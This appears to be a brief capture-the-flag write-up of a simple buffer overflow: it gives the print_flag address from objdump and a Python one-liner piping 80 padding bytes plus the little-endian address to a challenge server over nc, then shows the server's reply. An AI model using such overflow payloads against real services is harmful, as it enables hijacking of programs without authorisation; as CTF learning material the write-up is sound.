Simple buffer overflow we get the address for print_flag from using objdump, the address is passed at the seg fault and is reversed for the exploit.
`Address of print_flag: 0x080484dd`
`python -c "print 'A'*80 + '\xdd\x84\x04\x08'" | nc 184.108.40.206 1234`
How's the josh?
Your josh is low!